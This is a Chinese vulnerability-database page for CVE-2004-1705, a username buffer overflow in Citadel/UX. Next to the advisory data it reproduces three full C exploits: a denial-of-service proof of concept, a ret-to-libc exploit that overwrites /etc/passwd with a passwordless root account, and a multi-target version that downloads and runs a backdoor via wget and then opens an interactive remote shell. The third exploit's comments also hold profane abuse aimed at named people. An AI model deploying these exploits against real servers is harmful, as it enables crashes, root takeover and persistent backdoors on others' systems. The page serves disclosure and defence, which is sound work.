CVE-2004-1705
CVSS5.0
发布时间 :2004-07-30 00:00:00
修订时间 :2016-10-17 22:59:30
NMCOE    

[原文]Buffer overflow in Citadel/UX 6.23 and earlier allows remote attackers to cause a denial of service via a long username.


[CNNVD]Citadel/UX用户名缓冲区溢出漏洞(CNNVD-200407-098)

        Citadel/UX 6.23以及之前的版本存在缓冲区溢出漏洞。远程攻击者借助超长用户名导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:citadel:ux:5.91Citadel Citadel_UX 5.91
cpe:/a:citadel:ux:5.90Citadel Citadel_UX 5.90
cpe:/a:citadel:ux:6.08Citadel Citadel_UX 6.08
cpe:/a:citadel:ux:6.07Citadel Citadel_UX 6.07
cpe:/a:citadel:ux:6.23Citadel Citadel_UX 6.23

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1705
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1705
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-098
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109121546120575&w=2
(UNKNOWN)  BUGTRAQ  20040731 Citadel/UX Remote DoS Vulnerability
http://marc.info/?l=bugtraq&m=109146099404071&w=2
(UNKNOWN)  BUGTRAQ  20040731 Re: Citadel/UX Remote DoS Vulnerability
http://securitytracker.com/id?1010809
(VENDOR_ADVISORY)  SECTRACK  1010809
http://www.nosystem.com.ar/advisories/advisory-04.txt
(VENDOR_ADVISORY)  MISC  http://www.nosystem.com.ar/advisories/advisory-04.txt
http://www.securityfocus.com/bid/10833
(VENDOR_ADVISORY)  BID  10833
http://xforce.iss.net/xforce/xfdb/16840
(VENDOR_ADVISORY)  XF  citadel-user-dos(16840)

- 漏洞信息

Citadel/UX用户名缓冲区溢出漏洞
中危 缓冲区溢出
2004-07-30 00:00:00 2006-08-28 00:00:00
远程  
        Citadel/UX 6.23以及之前的版本存在缓冲区溢出漏洞。远程攻击者借助超长用户名导致服务拒绝。

- 公告与补丁

        It is reported that the vendor has addressed this issue; the fix exists in the CVS tree. It is reported that the fix will be included in the next release of Citadel/UX this is not confirmed.
        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (370)

Citadel/UX Remote Denial of Service Exploit (PoC) (EDBID:370)
linux dos
2004-08-02 Verified
0 CoKi
N/A [点击下载]
/* citadel_dos.c
*
* Citadel/UX Remote DoS exploit (Proof of Concept)
*
* Tested in Slackware 9.0.0 / 9.1.0 / 10.0.0
*
* by CoKi <coki@nosystem.com.ar>
* No System Group - http://www.nosystem.com.ar
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define BUFFERSIZE 96+1
#define ERROR -1
#define TIMEOUT 3
#define PORT 504

int connect_timeout(int sfd, struct sockaddr *serv_addr,
socklen_t addrlen, int timeout);
void use(char *program);

int main(int argc, char *argv[]) {
char buffer[BUFFERSIZE], *p, temp[BUFFERSIZE];
int sockfd;
struct hostent *he;
struct sockaddr_in dest_dir;

if(argc != 2) use(argv[0]);

p = buffer;

printf("\n Citadel/UX Remote DoS exploit (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");

memset(p, 'A', 96);
p += 92;
*p = '\0';

printf(" [+] verifying host:\t");
fflush(stdout);

if((he=gethostbyname(argv[1])) == NULL) {
herror("Error");
printf("\n");
exit(1);
}

printf("OK\n");

if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
perror("Error");
printf("\n");
exit(1);
}

dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(PORT);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);

printf(" [+] conecting...\t");
fflush(stdout);

if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT) == ERROR) {

printf("Closed\n\n");
exit(1);
}

printf("OK\n");

printf(" [+] sending exploit...\t");
fflush(stdout);

recv(sockfd, temp, sizeof(temp), 0);
send(sockfd, "USER ", 5, 0);
send(sockfd, buffer, strlen(buffer), 0);
send(sockfd, "\n", 1, 0);
close(sockfd);

printf("OK\n\n");
}

int connect_timeout(int sfd, struct sockaddr *serv_addr,
socklen_t addrlen, int timeout) {

int res, slen, flags;
struct timeval tv;
struct sockaddr_in addr;
fd_set rdf, wrf;

fcntl(sfd, F_SETFL, O_NONBLOCK);

res = connect(sfd, serv_addr, addrlen);

if (res >= 0) return res;

FD_ZERO(&rdf);
FD_ZERO(&wrf);

FD_SET(sfd, &rdf);
FD_SET(sfd, &wrf);
bzero(&tv, sizeof(tv));
tv.tv_sec = timeout;

if (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0)
return -1;

if (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) {
slen = sizeof(addr);
if (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1)
return -1;

flags = fcntl(sfd, F_GETFL, NULL);
fcntl(sfd, F_SETFL, flags & ~O_NONBLOCK);

return 0;
}

return -1;
}

void use(char *program) {
printf("Use: %s <host>\n", program);
exit(1);
}
---------------------------------- End Code: citadel_dos.c ----------------------------------

Compiling and running in the following manner:
coki@servidor:~$ make citadel_dos
coki@servidor:~$ ./citadel_dos localhost

Citadel/UX Remote DoS exploit (Proof of Concept)
by CoKi 

[+] verifying host: OK
[+] conecting... OK
[+] sending exploit... OK

coki@servidor:~$ 

// milw0rm.com [2004-08-02]
		

- 漏洞信息 (424)

Citadel/UX Remote Buffer Overflow Exploit (EDBID:424)
linux remote
2004-08-30 Verified
504 Nebunu
N/A [点击下载]
/*
Citadel/UX remote exploit
By nebunu: pppppppal at yahoo dot com
home.ro lamerz erased my nebunu@home.ro address for hosting exploits there..

Citadel/UX is a very well known client/server messaging for BBS which runs on port 504 by default.
It has been discovered that is suffers for a buffer overflow when USER is sent.
The bug was discovered by CoKi,who wrote a PoC denial of service exploit.

I downloaded the source code and performed an audit.The vulnerable function lays in
user_ops.c and it is called getuser().The legal size of an user string is only 64 characters.
When 97 characters are entered then EIP is overwriten and a DoS occurs.

The exploitation is not possible in the trivial way,because of tolower() function that makes
ineffective any shellcode or return address.
But since i had nothing to do i decided to take a closer look..

root@nebunu local]# cd citadel
[root@nebunu citadel]# objdump -R ./citserver | grep system
08126abc R_386_JUMP_SLOT system
[root@nebunu citadel]#

So,the ret-to-libc tehnique is possible if the return address of system() and our command string
escapes tolower(),and on many systems it does,like slackware,freebsd and many others i havent tested.

1) How to get system() address for a platform

The above is just an example on my redhat9 distro.It wont work since the
system address contains a 0x42 which is B.

[root@nebunu hack]# cat sys.c

#include <stdio.h>
main()
{
system();
}
[root@nebunu hack]# gcc sys.c -o sys
[root@nebunu hack]# gdb sys
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) break main
Breakpoint 1 at 0x804832e
(gdb) r
Starting program: /root/hack/sys

Breakpoint 1, 0x0804832e in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x4203f2c0 <system> // system address here
(gdb) quit
The program is running. Exit anyway? (y or n) y
[root@nebunu hack]#

Oh,system() address and retaddr offset are supplied by hand,i refuse to
provide automated tools for kiddies.

Greetings to : rebel,R4X,Bagabontu,DrBIOS,Aziz,sorbo,(we talked once or twice on #darkircop)

*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

/*
This works only if citadel server is run as root,use your imagination
and add your own command which will provide you further acces.
Be careful what chars you use for the command,since not all chars are parsable.
*/

#define COMMAND "echo h4ck3r::0:0::/:/bin/bash >/etc/passwd;"
#define BUFFER 93
#define CITADEL_PORT 504
#define SYSADDR 0x4006be80 //for slack 9.1.0 only,change it
#define RETADDR 0xbffff000 //base for bruteforce,play with this proggie and get the right offset

int main(int argc,char **argv)
{
int i,sock,t,len,n;
char overflow[500],system[8],ret[8];
char egg[500];
int *pt;
struct sockaddr_in addy;

if(argc!=3)
{
printf("\r\nCitadel/UX remote exploit by nebunu <pppppppal at yahoo dot com>\r\nUsage: %s <target ip> <retaddr offset>\r\n",argv[0]);
exit(-1);
}

if(strlen(COMMAND)>90)
{
printf("\r\nCommand string too large\r\n");
exit(-1);
}

/* Lets build the exploit payload */

memset(overflow,0,500);
memset(egg,0,500);
memset(ret,0,8);
memset(system,0,8);
for(i=0;i<(BUFFER-strlen(COMMAND));i++)
overflow[i]='/';
strcat(overflow,COMMAND);
pt=(int *)system;
for(i=0;i<4;i+=4)*pt++=SYSADDR;
strcat(overflow,system);
strcat(overflow,"HACK");
pt=(int *)ret;
for(i=0;i<4;i+=4)*pt++=(RETADDR+atoi(argv[2]));
strcat(overflow,ret);
strcpy(egg,"USER ");
strcat(egg,overflow);
strcat(egg,"\n");
/* And send it */

sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==-1)
{
perror("socket()");
exit(-1);
}
addy.sin_family=AF_INET;
addy.sin_port=htons(CITADEL_PORT);
addy.sin_addr.s_addr=inet_addr(argv[1]);
t=connect(sock,(struct sockaddr *)&addy,sizeof(struct sockaddr_in));
if(t==-1)
{
perror("connect()");
exit(-1);
}
printf("\r\nConnected..OK\n");
printf("Sending exploit code..\n");
write(sock,egg,strlen(egg));
printf("Exploit sent! Now test if succesfull.\n");
}

// milw0rm.com [2004-08-30]
		

- 漏洞信息 (437)

Citadel/UX <= 6.23 Remote USER Directive Exploit (Private Version) (EDBID:437)
linux remote
2004-09-09 Verified
504 Nebunu
N/A [点击下载]
/*
Citadel/UX remote exploit
By nebunu: pppppppal at yahoo dot com

This is the version which contains targets,abuse it kiddies

Bruteforce:

You only have 4096/4=1024 tries.
The magic offset lies about 2048 + or - 4,8,16....256
So practically speaking you have maximum 256 tries.


Greetings: DrBIOS,Bagabontu,rebel,R4X and all the friends i have.

F goes to: #rosec @ undernet, www rosec info read and laugh
lacroix you are a big lamer,a little script kiddie who wants to gain fame on vortex.pulltheplug
wargame server.By the way,you pathetic cunt..have you even hacked into a box other than yours?
Mad anal fucks goes to all #rosec members,dont forget their moms.

My little private message:

Sa va bagam pule in gat celor de pe irc.apropo.ro,in special lui shell (nimeni) si toata
gasca de cacaciosi de la #rosec
Ce tupeu pe voi sa vreti donatii in e-gold..va dau eu donatii in sloboz..
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

/*
Place here your own link which contains a backdoor (blackhole.c) which listens on port 12345
*/

#define COMMAND "cd /tmp;wget http://your-site-here.com/a;/tmp/a;"
#define BUFFER 93            
#define CITADEL_PORT 504
#define RETADDR 0xbffff000 
#define BACKDOOR_PORT 12345
#define MAXTARGETS 9


struct architecture 
{
char *platform;     
int syst;          
}arch[]={
{"Red Hat 7.1 (Seawolf)",0x4006aef0},
{"Red Hat 7.2 (Enigma)",0x4006f664},
{"Red Hat 7.3 (Valhalla)",0x080482d0},
{"SuSE Linux 8.0",0x4006f004},
{"Debian sid unstable release",0x4005f270},
{"Slackware 8.0.0",0x40062870},
{"Slackware 9.0.0",0x40061530},
{"Slackware 9.1.0",0x4006be80},
{"SuSE Linux 8.0",0x4006f004},
};
        



void shell(int sock)
{
fd_set  fd_read;
char buff[1024000], *cmd="cd /;uname -a;id\n";
int n;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);
send(sock, cmd, strlen(cmd), 0);
while(1) {        
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;
if (FD_ISSET(sock, &fd_read)) 
{
if((n = recv(sock, buff, sizeof(buff), 0)) < 0)
{
fprintf(stderr, "EOF\n");
exit(2);
}
if (write(1, buff, n) > 0);
}
if (FD_ISSET(0, &fd_read)) 
{        
if((n = read(0, buff, sizeof(buff))) < 0)
{
fprintf(stderr, "EOF\n");
exit(2);
}
if (send(sock, buff, n, 0) < 0) break;
}
usleep(10);
}
fprintf(stderr, "Connection lost.\n\n");
exit(0);
}


int fuck(char *fuck)
{
struct sockaddr_in addr2;	
int sock2	= 0;
if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) 
{
return -1;
}

addr2.sin_addr.s_addr=inet_addr(fuck);
addr2.sin_family = AF_INET;
addr2.sin_port   = htons(BACKDOOR_PORT);
if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) 
{
printf("\n\nExploit failed!\n\n");
return -1;
}
shell(sock2);
close(sock2);
return 0;
}

void exploit(char ip[16],int target,int tryy)
{
int i,sock,t,len,n;
char overflow[500],system[8],ret[8];
char egg[500];
int *pt;
int retaddr;
struct sockaddr_in addy;

retaddr=RETADDR+tryy;
memset(overflow,0,500);
memset(egg,0,500);
memset(ret,0,8);
memset(system,0,8);
for(i=0;i<(BUFFER-strlen(COMMAND));i++)
overflow[i]='/';
strcat(overflow,COMMAND);
pt=(int *)system;
for(i=0;i<4;i+=4)*pt++=arch[target].syst;
strcat(overflow,system);
strcat(overflow,"AAAA");
pt=(int *)ret;
for(i=0;i<4;i+=4)*pt++=retaddr;
strcat(overflow,ret);
strcpy(egg,"USER ");
strcat(egg,overflow);
strcat(egg,"\n");

sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==-1)
{
perror("socket()");
exit(-1);
}
addy.sin_family=AF_INET;
addy.sin_port=htons(CITADEL_PORT);
addy.sin_addr.s_addr=inet_addr(ip);
t=connect(sock,(struct sockaddr *)&addy,sizeof(struct sockaddr_in));
if(t==-1)
{
perror("connect()");
exit(-1);
}
write(sock,egg,strlen(egg));
printf("%s\n",egg);
close(sock);
}



int main(int argc,char **argv)
{

int i,targ;
if(argc!=4)
{
printf("\r\nCitadel/UX remote exploit (private version) by nebunu <pppppppal at yahoo dot com>\r\n
Usage: %s <target ip> <target number> <offset [1..4096]>\r\n",argv[0]);
printf("\nAvailable targets:\n");
for(i=0;i<MAXTARGETS;i++)printf("\n%u) Platform %s,system=0x%x",i,arch[i].platform,arch[i].syst);
printf("\n");
exit(-1);
}


if(strlen(COMMAND)>92)
{
printf("\r\nCommand string too large\r\n");
exit(-1);
}

targ=atoi(argv[2]);
printf("\r\nAttacking %s\n",arch[targ].platform);
exploit(argv[1],targ,atoi(argv[3]));
fuck(argv[1]);

}

// milw0rm.com [2004-09-09]
		

- 漏洞信息

8280
Citadel/UX USER Command Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

Citadel/UX contains a flaw that may allow a remote denial of service. The issue is triggered when a user connects to port 504 on the server and sends a 'USER' command containing more than 97 bytes causing a buffer overflow. This will cause the server to crash resulting in loss of availability for the server.

- 时间线

2004-07-29 Unknow
2004-07-29 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Citadel/UX has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站